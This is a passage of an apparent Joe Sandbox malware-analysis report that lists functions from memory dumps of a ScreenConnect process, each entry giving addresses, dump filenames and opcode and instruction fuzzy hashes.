                                                                                                                                                                                                                                                          • Opcode ID: 58f9f9c2642e7d62d0cb92863a33943f6eb48a39e1ae83f298e542044cb0d824
                                                                                                                                                                                                                                                          • Instruction ID: bca8538788e8118ac93c71fda38e10c9aec18c9b6eab247acdbedccd5c3abcf2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58f9f9c2642e7d62d0cb92863a33943f6eb48a39e1ae83f298e542044cb0d824
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF0877085021A8FDB12DF24DC54BAABBB0FB45311F458969C611DB289CB74262ACB82
                                                                                                                                                                                                                                                          Function 03CF5320 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e9a497621dd9df860ad0cf027f0ea50979382c7d7d3ea88d673b763555806b78
                                                                                                                                                                                                                                                          • Instruction ID: 7fb1765749e4f740cb2072708a6c38107a260fda87a580070091070ebe752da9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9a497621dd9df860ad0cf027f0ea50979382c7d7d3ea88d673b763555806b78
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BF05E353007009FE3149B59E944E56B7E9EF8A724F1984A9E545CF3A2D771EC01CB90
                                                                                                                                                                                                                                                          Function 03CF3FA0 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 96ef68f4475237b25320d818a6aa1b11a8b4b4abbf0c2e57a1196676144002d5
                                                                                                                                                                                                                                                          • Instruction ID: a909c1924abc7c99cc5799b12b2ed998682ec11b22ff335526d23e7b47c951e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96ef68f4475237b25320d818a6aa1b11a8b4b4abbf0c2e57a1196676144002d5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F082323003086F9710DAA9E840D9FB7E9EFC56B43148629F919CB391DB71ED0187A5
                                                                                                                                                                                                                                                          Function 015CF93F Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1446023d7280e6ddb2fa17092d6d5e8582d76e1978d42c27ce88583db7fc805d
                                                                                                                                                                                                                                                          • Instruction ID: 67a6eb5b4806adbaa06c0b7f8970ff48a439a46f757c3d878d7e22081943e439
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1446023d7280e6ddb2fa17092d6d5e8582d76e1978d42c27ce88583db7fc805d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F0E5327012014FC3249A2DEC915D67FB6EFC9751B54847DD008CB362D9329C17C750
                                                                                                                                                                                                                                                          Function 03CF2650 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b01ddf3e86292a610245342102ee4a8117e97bd635e384e95a96c76a41f9084c
                                                                                                                                                                                                                                                          • Instruction ID: 0f4963dedf383c33ab08b8fe05971d29037adff8e198af877059a6d25b954c0a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b01ddf3e86292a610245342102ee4a8117e97bd635e384e95a96c76a41f9084c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65F0DA3011E3E45FD7039B29D8A06917FB19E4722431A85D7C484CF2A7CA25DC49CBAA
                                                                                                                                                                                                                                                          Function 03CF4FC0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1ebc215950a70c52453bd000f8d3748aef912784dd2218b5bf986aba4160371f
                                                                                                                                                                                                                                                          • Instruction ID: 12dd59587650d890b719e71b7fa8a17dd5aa99c2b634c9d2d7cbd025d82a73d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ebc215950a70c52453bd000f8d3748aef912784dd2218b5bf986aba4160371f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67F05E327003045BD708EB6AA80199FB7EAEEC5664308C56EE50DCB311EF35ED028B95
                                                                                                                                                                                                                                                          Function 015CAA48 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7bbb9bf4d9e62d837cc17cd955a1631ec3cd036c4d42cc02ea7cd4eefa73fae2
                                                                                                                                                                                                                                                          • Instruction ID: 59bfd983c382624f2087cbd7cc0a7028b7d65f3a4c8d713193d6d6de39e53893
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bbb9bf4d9e62d837cc17cd955a1631ec3cd036c4d42cc02ea7cd4eefa73fae2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF020333002404FCB066FAAA88821ABFE6FB8AA60718047EF609CB341CE204C068791
                                                                                                                                                                                                                                                          Function 03CF2EC0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: a1fc0a609c018f741e2c412e0eed4f6e3c77abc5533cd6e277f480ceb2802023
                                                                                                                                                                                                                                                          • Instruction ID: 4d9384fd2d330206c0d2f3b2ccb1f082158fd51d41002b02583dc594bc62edd8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1fc0a609c018f741e2c412e0eed4f6e3c77abc5533cd6e277f480ceb2802023
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F06D75D5020BCFDB40DF54EC547AE77B4FB44325F008C65D210DB240CB7416199B82
                                                                                                                                                                                                                                                          Function 015C0E1F Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 2fa4bffea542ea9d0f538567e170a313ce4f5140e3a3697100918df4ee580756
                                                                                                                                                                                                                                                          • Instruction ID: 45b4423284216b152084caef43bf4ccdb766460e15fcd3073e2eed80d5333957
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fa4bffea542ea9d0f538567e170a313ce4f5140e3a3697100918df4ee580756
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF0B4325093409FC7126B74A82549F7BA2EFC266070589BFD0068F682DA658C069FD2
                                                                                                                                                                                                                                                          Function 015C31F0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 95929c2972793174078f872d1845a78874cd0e858ab19b9205034c54e8bdc17e
                                                                                                                                                                                                                                                          • Instruction ID: 9e4e281c5138490a51a87e0a98773fc2b16721cfe9cd500f99be6a0b5f6fdff3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95929c2972793174078f872d1845a78874cd0e858ab19b9205034c54e8bdc17e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF03770A0020CEFDF80EFE8D84569CBBF1FB01640F1080A8C505EB240DB346E41EB41
                                                                                                                                                                                                                                                          Function 015C31E0 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8806cbb1437f97149635848fad307b6b39f8fca092d4bf67be67c54e4b3ce49a
                                                                                                                                                                                                                                                          • Instruction ID: 533308abdfa2489dbc93703c270e11fb86aa997ecf21292d949c5208912d27f9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8806cbb1437f97149635848fad307b6b39f8fca092d4bf67be67c54e4b3ce49a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF03C70908248EFDF81EFA8D88539CBFF1FB02640F148499C505DB251D7345A45EB42
                                                                                                                                                                                                                                                          Function 015C329C Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3c0bd53a1f735b1814b08d8c76a736dd2d7bd070e5ba361b319b36004f1ddbb6
                                                                                                                                                                                                                                                          • Instruction ID: 561b20c10766b5ee718889bc4d619c989d13f651cb387c85ead0a3560117401f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c0bd53a1f735b1814b08d8c76a736dd2d7bd070e5ba361b319b36004f1ddbb6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74F02B639082944FE713C768B8517993FE1BF83260B4D45CFD041CF553D758A509D792
                                                                                                                                                                                                                                                          Function 015CE2A2 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c69e6a2b9eac6a6acc3e3a7610399fd966e4f665ebd99904d77e11c0e3c0eca5
                                                                                                                                                                                                                                                          • Instruction ID: d126090fb3ed3eee8211541cfa028016f44c58a5ba88ba533a2e8238a7d81f16
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c69e6a2b9eac6a6acc3e3a7610399fd966e4f665ebd99904d77e11c0e3c0eca5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41F05E30700218CFE715DF69C455BAEBBE2EF886507058069E909CB364DB35DE11CB81
                                                                                                                                                                                                                                                          Function 015CEBA0 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 220faa2acd0a23a98fa43dc1306efbe494f48c528ef52f8aa8df2f12815a9974
                                                                                                                                                                                                                                                          • Instruction ID: f8ed6b118d1f466b2993b7d8a60eb1ee60615c346f695c07bf48cab167fa3e26
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 220faa2acd0a23a98fa43dc1306efbe494f48c528ef52f8aa8df2f12815a9974
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E065767042096F4705CE8ED401D6BBFEEEFD9620714C02AF80DCB305DA39D91187A0
                                                                                                                                                                                                                                                          Function 015C5A05 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 61680e9371dcbd29c4642410451356fbe596e251bab95b45807a38e9d9f8e919
                                                                                                                                                                                                                                                          • Instruction ID: c77dfad870786c6f00b9df847059820210473563e1e064b314b858c227760ce9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61680e9371dcbd29c4642410451356fbe596e251bab95b45807a38e9d9f8e919
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33E0E5723052019FC7023AE8A85429E7B56FED65313044067D099CA386EF649C46D252
                                                                                                                                                                                                                                                          Function 015CA9B9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5ac6c5358591689a7e11878cdb045469ae6e4bf1c59b57c095de8919aa494c46
                                                                                                                                                                                                                                                          • Instruction ID: cf30c960c8c2e5cafb3591e03188e7f2a0a8c2272eac1dc12a009a56b5953bce
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ac6c5358591689a7e11878cdb045469ae6e4bf1c59b57c095de8919aa494c46
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3E02673E0A0145FCB204EADEC549EB3FE8EEC56B431901ABD40ECB301E9245C01CB90
                                                                                                                                                                                                                                                          Function 015CDF28 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 205d5f22b3405a57fa65be9de2f8b91fb09f31fceac9687d0ee146875f3fe2f9
                                                                                                                                                                                                                                                          • Instruction ID: 1d0d55aa777761e14b8340eaa3ad11ab5abf3fd7008af9e326fe38dfa5abe1a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 205d5f22b3405a57fa65be9de2f8b91fb09f31fceac9687d0ee146875f3fe2f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0F03A7090620DEFCF12EFB4E94565DBBB1FB45705F2145AAD409D7211E7345D04EB42
                                                                                                                                                                                                                                                          Function 015CE268 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bd9ae74a26f7461c0956664a945658b6f13d9338b7d23aebc3dc9c55c30a6006
                                                                                                                                                                                                                                                          • Instruction ID: 4574b3e19d14ab8ae9e16d3248a8ca8168d7ccee41aa9199f9d1c9670ce0a946
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd9ae74a26f7461c0956664a945658b6f13d9338b7d23aebc3dc9c55c30a6006
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF0B271E002199F8B40DFADC84169EFBF5FF49200B24806AD918EB210E331AA12CB90
                                                                                                                                                                                                                                                          Function 015CAA58 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4ea5ef152d9d6e27a0a2c979768d20f2359b733bb65bd7a33264290198d7de41
                                                                                                                                                                                                                                                          • Instruction ID: aea173286ee3b891b6667fb97293652418082f890ef9aa394463605f5775bfba
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea5ef152d9d6e27a0a2c979768d20f2359b733bb65bd7a33264290198d7de41
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16E0DF333002145B8A042AAE788862EBBDBEBC8A61714443DF20AC3340CE658C0553A0
                                                                                                                                                                                                                                                          Function 015C4EE8 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 74ad055f66f49f81ef319a52d6ee74de5e03d89840cb759518fe4ac65878c212
                                                                                                                                                                                                                                                          • Instruction ID: 877b989ddeb4c36d31dd0da591a73891f9b07fb985693b2c3c199ad3741d96f8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74ad055f66f49f81ef319a52d6ee74de5e03d89840cb759518fe4ac65878c212
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E02BB290D2806FCB159BEDA860BAE7FF4DF87310F0540EFD048D7242D93544058355
                                                                                                                                                                                                                                                          Function 015C5920 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ffad5811b07c6740088f66577ebc7fb19b5ee98abaac4448945be98a23d279f1
                                                                                                                                                                                                                                                          • Instruction ID: 068c24dc65cbd9c014238310ea090204a35c1483da6199b0fd954afd7cd79667
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffad5811b07c6740088f66577ebc7fb19b5ee98abaac4448945be98a23d279f1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9F0A0353012548BC712BB78A818A597FAAFBCB261B0441A6E41AC7389CF308C02E792
                                                                                                                                                                                                                                                          Function 015C0E30 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: beccd2efb0ebeea39953c0a7313aef9e0cd69f6f931966ddd0b1fed38cd3ee72
                                                                                                                                                                                                                                                          • Instruction ID: 92bac735ba40c9319d03d57a21fe90e345fdbcd6a7806840418425b9eb718005
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: beccd2efb0ebeea39953c0a7313aef9e0cd69f6f931966ddd0b1fed38cd3ee72
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E092326003049783007BB4A81589F37E7EEC5664304C97FE10A8F342EE629D065BD6
                                                                                                                                                                                                                                                          Function 015CF950 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1902533594.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_15c0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 5659521c139a65ee0d95c6e4e113053db6b9b4527313df1abde51dc61270ce1b
                                                                                                                                                                                                                                                          • Instruction ID: 5de25f5e954f3f9f068e1c3bc0be790b7fbb87c61285de72675c865b7b132176
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5659521c139a65ee0d95c6e4e113053db6b9b4527313df1abde51dc61270ce1b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE026327012010BC304965AEC50997B7AAEBC8B60B50843CE10CCB312CD729C06C390
                                                                                                                                                                                                                                                          Function 03CF5330 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1907601136.0000000003CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03CF0000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_3cf0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3d38167eedbfef9ec8c8a1b6c5380d7c6b6a7d16ee4d4f0f504f22011394eacb
                                                                                                                                                                                                                                                          • Instruction ID: 0c3174e890a5c9014f20f23183a3cdb2c12166e0fcc8af93d6b7da3658f18a53
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d38167eedbfef9ec8c8a1b6c5380d7c6b6a7d16ee4d4f0f504f22011394eacb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBE06D343007008FC314DB19D144E56B7E6EF89B20F1984ADE5098B7A1CBB1EC41CB90
                                                                                                                                                                                                                                                          Function 03CF5021 Relevance: .0, Instructions: 25COMMON
